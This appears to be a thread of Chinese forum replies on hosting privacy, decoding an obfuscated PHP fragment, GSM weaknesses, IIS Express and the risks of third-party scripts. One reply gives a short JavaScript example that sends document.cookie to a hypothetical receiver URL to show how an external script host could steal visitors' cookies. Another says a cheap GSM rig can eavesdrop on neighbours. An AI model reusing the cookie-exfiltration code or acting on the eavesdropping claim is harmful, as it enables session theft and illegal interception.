很多托管的机子，beian时要提交服务器最高权限密码的。以便WJ随时登上去审查。
如果竟然不用，那就是人家根本不需要那密码。
虚拟主机、VPS、云主机 ，你对人家是完全透明的！！这是常识好伐？人家拿你数据，不是能不能的问题，而是想不想的问题。

你对数据隐私这么担心？那你们用什么IM？用哪家的邮箱？即使是自己域名的企业邮箱，你对邮局提供方也是透明的。除非你们自己搭建邮件服务器。

http://ww2.sinaimg.cn/large/bcd68078jw1ebxpsjooqfj20ow05faak.jpg
这种？

天亮了，放弃了。谁有耐心谁解吧。
谁能翻译这个？在容错条件下执行
array('\14',', $',') { ','[$i]','substr($','a = $xx("|","',',strpos($y,"9")',' = str_replace($','x3','\x7','\15',';$i++) {','function ','x6','); ','for($i=0;$i';

楼上你妹的，没解完你发个蛋。你也卡$v9这了吧？这个解开就全解开了。

国内互联网基础设施存在安全缺陷，可以在任意网站挂马/篡改文件。也就是万能0day。
验证方法：用其他地区（尽量是国外）的VPS/服务器 下载一下旋风那个离线。如果sha1正常。那就是黑客用上述办法做到的。

楼主知道09年断网事件么？dnspod被黑客打瘫，只能把暴风域名转到电信的DNS解析，电信DNS瞬间被海量请求拖垮，导致国内大面积断网。
http://tech.163.com/09/0523/11/5A0BTQQN000915BF.html

@webjin 在VS里点“编译运行(F5)”，弹出的页面就是运行在IIS Express里的。不用单独安装，也不能用于生产环境。

在vs里点▶，会自动监听端口并弹出浏览器，就是个配置好的模拟环境，不涉及IIS。
我们大三时.net大作业就是asp.net项目，检查时就是点▶，然后看看页面啦、链接啦、按钮啦，数据库增删改查啦。所有的人都通过了。但没一个人会配置IIS环境。

站长圈有个口号：“低调做站，防止被攻击”。看来移动互联网同样适用。

预置在软件里的，到日期了自动变。

稍微动动脑筋就可以的。但是别公开讨论~！

把xp c盘原封不动拷进U盘，然后用bootice设置一下引导记录。
拷贝时可能有文件卡住，找到文件，在权限设置里取得所有权即可。

有网关权限，自然可以截取你上网产生的全部数据。
tx在职能范围内已经尽力了：http://bbs.pediy.com/showthread.php?t=165808

你觉得GSM安全不？2009年末就被破解了。之后伪基站这种设备才大规模出现。
搭建一个GSM监听设备，只需50块钱的成本。照着网上的说明，搭好之后，你就能监听邻居、同事的手机通话和短信了。

一个孩子，上有两个父母，再上，4个中老年人。在往上，可能还有老人。
6个人围着1个孩子转，怎么可能不溺爱。。

作为程序员，你应该知道，未来社会人类是不用劳动的。机器会帮你把大部分事情做了。

如果连《上下五千年》都没读过。那先把这个读了吧。

验证码、限IP，都无法阻止批量注册行为。

@yushiro
@wodemyworld
@binux
@dorentus
不一定需要通信链路上中间人权限、或者电脑中了木马 才能窃取cookie。
任何引入外部的js文件，文件宿主方，都可以窃取目标网站访客的全部cookie！比如：广告联盟代码、统计代码、社会化分享按钮、外部ajax库、社会化评论框、社会化登录按钮。。。。
以v2ex为例，如果google想窃取v2ex全站用户cookie，只要在google-analytics.com/ga.js 里悄悄加几行代码就ok。没有跨域问题，用户也不会收到任何提示。比如：
var url="http://www.google-analytics.com/getcookie.php?cookie="; //假设的接收端
var imgxx = new Image();
imgxx .src = url+document.cookie;
这样，v2ex用户的cookie雪片般飞向google，一天以后，用户cookie就被偷的差不多了。
这只是举例。google不至于这样做。但别的厂商呢？